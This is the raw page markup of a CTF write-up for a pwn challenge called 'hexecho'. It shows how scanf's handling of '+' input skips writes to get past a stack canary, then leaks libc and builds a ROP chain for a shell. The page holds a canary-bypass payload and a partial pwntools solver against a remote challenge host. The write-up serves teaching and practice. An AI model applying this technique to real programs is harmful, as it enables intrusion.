viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 
3-3.5S14.5 6 13 6z\"></path></svg></a>scanf Specifications and How to Exploit Them</h3>\n<p>In glibc 2.35, which this challenge binary uses, <code class=\"language-text\">scanf</code> is implemented as follows.</p>\n<p>This function internally uses <code class=\"language-text\">__vfscanf_internal</code> and returns its <code class=\"language-text\">done</code> value.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">int</span> <span class=\"token function\">__scanf</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>format<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  va_list arg<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> done<span class=\"token punctuation\">;</span>\n\n  <span class=\"token function\">va_start</span> <span class=\"token punctuation\">(</span>arg<span class=\"token punctuation\">,</span> format<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  done <span class=\"token operator\">=</span> <span class=\"token function\">__vfscanf_internal</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> format<span class=\"token punctuation\">,</span> arg<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">va_end</span> <span class=\"token punctuation\">(</span>arg<span class=\"token punctuation\">)</span><span class=\"token 
;</span>">
punctuation\">;</span>\n\n  <span class=\"token keyword\">return</span> done<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Reference: <a href=\"https://github.com/bminor/glibc/blob/glibc-2.35/stdio-common/scanf.c\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">glibc/stdio-common/scanf.c at glibc-2.35 · bminor/glibc</a></p>\n<p>The <code class=\"language-text\">vfscanf-internal.c</code> file is roughly 3,000 lines long, and honestly I did not feel like reading all of it, but I did notice several places where <code class=\"language-text\">++done</code> is executed in code that appears to perform reads.</p>\n<p>Since <code class=\"language-text\">scanf</code> returns the number of items successfully read, it also seems likely that the lines immediately before <code class=\"language-text\">++done</code> are where the actual reads occur.</p>\n<p>Reference: <a href=\"https://github.com/bminor/glibc/blob/glibc-2.35/stdio-common/vfscanf-internal.c\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">glibc/stdio-common/vfscanf-internal.c at glibc-2.35 · bminor/glibc</a></p>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man3/scanf.3.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">scanf(3) - Linux manual page</a></p>\n<p>For <code class=\"language-text\">scanf</code>, when the input does not match the conversion in the format string, the call stops with a matching failure, returns only the number of conversions completed before that point (0 for a single <code class=\"language-text\">%02hhx</code>), and leaves the offending data in the input stream.</p>\n<p>I verified this locally with the following program: when a character that does not match the format is entered, it remains in <code class=\"language-text\">stdin</code> afterward.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token 
string\">&lt;stdio.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">100</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> ret<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> <span class=\"token number\">9</span><span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    buf<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token char\">'-'</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">for</span><span class=\"token 
punctuation\">(</span><span class=\"token keyword\">int</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> <span class=\"token number\">9</span><span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    ret <span class=\"token operator\">=</span> <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%02hhx\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token operator\">+</span>i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"BUF ==> %c\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"RET ==> %d\\n\"</span><span class=\"token punctuation\">,</span> ret<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Below is the state of <code class=\"language-text\">stdin</code> after entering a character that does not match the format.</p>\n<p>You can see that the character I entered remains in <code class=\"language-text\">stdin</code> even after calling <code class=\"language-text\">scanf</code>.</p>\n<p><span\n      
class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 673px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1d58e8437122aa643893f813f375cf03/c391c/image-20240822203003245.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 40%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1d58e8437122aa643893f813f375cf03/8ac56/image-20240822203003245.webp 240w,\n/static/1d58e8437122aa643893f813f375cf03/d3be9/image-20240822203003245.webp 480w,\n/static/1d58e8437122aa643893f813f375cf03/b8cf5/image-20240822203003245.webp 673w\"\n              sizes=\"(max-width: 673px) 100vw, 673px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1d58e8437122aa643893f813f375cf03/8ff5a/image-20240822203003245.png 240w,\n/static/1d58e8437122aa643893f813f375cf03/e85cb/image-20240822203003245.png 480w,\n/static/1d58e8437122aa643893f813f375cf03/c391c/image-20240822203003245.png 673w\"\n            sizes=\"(max-width: 673px) 100vw, 673px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1d58e8437122aa643893f813f375cf03/c391c/image-20240822203003245.png\"\n            alt=\"image-20240822203003245\"\n            title=\"image-20240822203003245\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>You can also see that when invalid input causes an error, the buffer is not 
overwritten.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 815px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/ef916/image-20240822213806022.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 65.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA20lEQVQ4y62TyW7EIBBEAS+YHYxj+zSZ2DNKZv3/v6swRJFyTx9KLbrEU3UL2HpIcHMHv/SwuYXUHZRN0H6EcgmDDbVqN9ae9vnHs7F4ETaMkIOE8w5SSrBt22G0hTUOjLH/62M7wjpbxTgB8OvyCR88Yox0CY0xUErRANd1gdaaDrif9jryKyUJ8PG8YykppynTJQwl4esdkQBP5x1pTPDe0wDvjxvmZUbORCNfbxdMbxNSSjTA9+Oh7jBEh1ZyND0H56L8Gg7RdGj7AVyIoqZeqLV4v2dRvL/Abyk1D53TEmFqAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/8ac56/image-20240822213806022.webp 240w,\n/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/d3be9/image-20240822213806022.webp 480w,\n/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/0ea8f/image-20240822213806022.webp 815w\"\n              sizes=\"(max-width: 815px) 100vw, 815px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/8ff5a/image-20240822213806022.png 240w,\n/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/e85cb/image-20240822213806022.png 480w,\n/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/ef916/image-20240822213806022.png 815w\"\n            sizes=\"(max-width: 815px) 100vw, 815px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/ef916/image-20240822213806022.png\"\n            alt=\"image-20240822213806022\"\n            title=\"image-20240822213806022\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>An interesting detail here is that sign characters such as <code class=\"language-text\">+</code> and <code class=\"language-text\">-</code> can be interpreted as hexadecimal input, but they do not satisfy the <code class=\"language-text\">%02hhx</code> format and therefore cause an input error. This lets us consume data from the input stream while skipping <code class=\"language-text\">scanf</code>’s write into the buffer.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 809px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/756bf78ae3f98af7d497892f3ea08105/e80ac/image-20240822214140557.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 79.58333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA4UlEQVQ4y62S646DIBSE0UShchUs7kWqra37b9v3f7lZsPsGnh8TTiD5MocZNj08fOIYrgL91EB5DuVGmOELOnxA9WM+P/e53Nnz9y7ty1uEy7OxDsYYhBDAtscGrQy0NGCsymLHFMcIITg4b1FV7Dhw+9ngnIO1NgMJHM7LBUopSCmPw4rSJaHruh1I4jClKTuUOJ0EjcN5mXPkeheJw/V+g+vfPSIBxnhG27ZomoZm5eWaV7aGzuH7D80eDE1tcsoyw0oXyWpTgIKqNut9/XdIVOzn6xfDEOB9j7quDwP/AOq4TSKJqMfTAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/756bf78ae3f98af7d497892f3ea08105/8ac56/image-20240822214140557.webp 
240w,\n/static/756bf78ae3f98af7d497892f3ea08105/d3be9/image-20240822214140557.webp 480w,\n/static/756bf78ae3f98af7d497892f3ea08105/f996b/image-20240822214140557.webp 809w\"\n              sizes=\"(max-width: 809px) 100vw, 809px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/756bf78ae3f98af7d497892f3ea08105/8ff5a/image-20240822214140557.png 240w,\n/static/756bf78ae3f98af7d497892f3ea08105/e85cb/image-20240822214140557.png 480w,\n/static/756bf78ae3f98af7d497892f3ea08105/e80ac/image-20240822214140557.png 809w\"\n            sizes=\"(max-width: 809px) 100vw, 809px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/756bf78ae3f98af7d497892f3ea08105/e80ac/image-20240822214140557.png\"\n            alt=\"image-20240822214140557\"\n            title=\"image-20240822214140557\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Because this challenge fills the buffer one byte at a time using the code below, we can exploit this behavior to use the buffer overflow without overwriting the canary bytes.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">void</span> <span class=\"token function\">get_hex</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>buf<span class=\"token punctuation\">,</span> <span class=\"token keyword\">unsigned</span> size<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> i <span class=\"token operator\">=</span> <span class=\"token 
number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> size<span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span> <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%02hhx\"</span><span class=\"token punctuation\">,</span> buf <span class=\"token operator\">+</span> i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<h3 id=\"bypassing-the-canary\" style=\"position:relative;\"><a href=\"#bypassing-the-canary\" aria-label=\"bypassing the canary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Bypassing the Canary</h3>\n<p>Based on the above, I successfully bypassed the canary with the following payload.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">payload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"+\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x118</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">b\"42\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x100</span>\n<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># 
Exploit</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Size: \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x118</span> <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span><span class=\"token number\">0x100</span><span class=\"token operator\">//</span><span class=\"token number\">2</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Data (hex): \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>After that, all that remained was to build a working ROP chain and get a shell.</p>\n<h3 id=\"leaking-libc\" style=\"position:relative;\"><a href=\"#leaking-libc\" aria-label=\"leaking libc permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Leaking 
libc</h3>\n<p>To get a shell with ROP, I next needed a way to leak a libc address.</p>\n<p>At first I considered leaking it via ROP, but looking more carefully, the line <code class=\"language-text\">printf(\"%02hhx \", (unsigned char)buf[i]);</code> simply prints the contents of the stack.</p>\n<p>Using this, I was able to obtain the address of <code class=\"language-text\">libc_start_main_ret</code> from the dumped stack.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/95b1d4c822050d70da8f5d481a5e6bd1/91b29/image-20240822223143349.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 70.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/95b1d4c822050d70da8f5d481a5e6bd1/8ac56/image-20240822223143349.webp 240w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/d3be9/image-20240822223143349.webp 480w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/e46b2/image-20240822223143349.webp 960w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/b4d37/image-20240822223143349.webp 983w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/95b1d4c822050d70da8f5d481a5e6bd1/8ff5a/image-20240822223143349.png 240w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/e85cb/image-20240822223143349.png 480w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/d9199/image-20240822223143349.png 960w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/91b29/image-20240822223143349.png 983w\"\n        
    sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/95b1d4c822050d70da8f5d481a5e6bd1/d9199/image-20240822223143349.png\"\n            alt=\"image-20240822223143349\"\n            title=\"image-20240822223143349\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"exploit\" style=\"position:relative;\"><a href=\"#exploit\" aria-label=\"exploit permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Exploit</h3>\n<p>After successfully bypassing the canary and leaking a libc address, I exploited the buffer overflow to execute a ROP chain, obtained a shell, and then got the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 870px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/3f3b9/image-20241019203747179.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 95.83333333333334%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAABfklEQVQ4y61U2W7CQAxcjpAg0iSACoQj1+YE0v7/1009RnlqpUrtPliz62PWsR0b2zRo2wb90GEYeuz3O5wvZ6TpCYfDu57DMMRyuYTv+/A8D6vVSs9EFZ/oIQgCmK7v0AhhUeSCNXgf7r1g+8KuRds1aJpa0dZWsEUtd8YxGerLqhSdhalspc68VLZEnmeoxFiUuTgVQlBpIG30IyF9SUAb/emXnlONM7W+3Kow0MoDDCjKQiWTgFyyJyEDq4moyFALOZEyfaGx4jjch1fKNbN8ZTQRUkcbg1jnUnT8xOf4wO12xUlqfbletNZE04kySmLMZjPM53MtPguvKIXmmcg7hT7UsSnGmO/C4pPsR+NfhPVwSyg1S5JE58kJ4f0x4O0tdJfhx+eoHXJGOI5PHUpnhJwxjoLDLludK2eEnENnHabwN1osFu4Ie9mBTgc7kw77wbQsvf83qJO1c5UFwf2XZTccjwdEUYTNZiPbe49kmyCOY+x2W6zX618JvwA7x6oLLc+7nAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/8ac56/image-20241019203747179.webp 240w,\n/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/d3be9/image-20241019203747179.webp 480w,\n/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/bf818/image-20241019203747179.webp 870w\"\n              sizes=\"(max-width: 870px) 100vw, 870px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/8ff5a/image-20241019203747179.png 240w,\n/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/e85cb/image-20241019203747179.png 480w,\n/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/3f3b9/image-20241019203747179.png 870w\"\n            sizes=\"(max-width: 870px) 100vw, 870px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/3f3b9/image-20241019203747179.png\"\n            alt=\"image-20241019203747179\"\n            title=\"image-20241019203747179\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The final solver I wrote is shown 
below.</p>\n<p>One thing that tripped me up was that when I tried to overwrite the buffer via <code class=\"language-text\">scanf(\"%02hhx\", buf + i);</code>, giving input such as <code class=\"language-text\">22134000</code> somehow caused it to be written as <code class=\"language-text\">02 02 13 40</code>.</p>\n<p>Separating the input values with spaces made it parse them correctly.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\n<span class=\"token comment\"># context.log_level = \"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\ncontext<span class=\"token punctuation\">.</span>terminal <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token string\">\"/mnt/c/Windows/system32/cmd.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"/c\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"start\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wt.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-w\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"0\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"sp\"</span><span class=\"token punctuation\">,</span> <span class=\"token 
string\">\"-s\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".75\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-d\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wsl.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'-d'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Ubuntu\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"bash\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-c\"</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token comment\"># Set gdb script</span>\ngdbscript <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\nb *0x401321\ncontinue\n\"\"\"</span></span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./hexecho\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token 
operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"34.170.146.252\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">29181</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\n    <span class=\"token comment\"># target = process(TARGET_PATH)</span>\n\nrop_ret <span class=\"token operator\">=</span> <span class=\"token string\">\" \"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>x<span class=\"token punctuation\">:</span><span class=\"token number\">0</span><span class=\"token punctuation\">{</span><span class=\"token number\">2</span><span class=\"token punctuation\">}</span>X<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span> <span class=\"token keyword\">for</span> x <span class=\"token keyword\">in</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x401370</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token 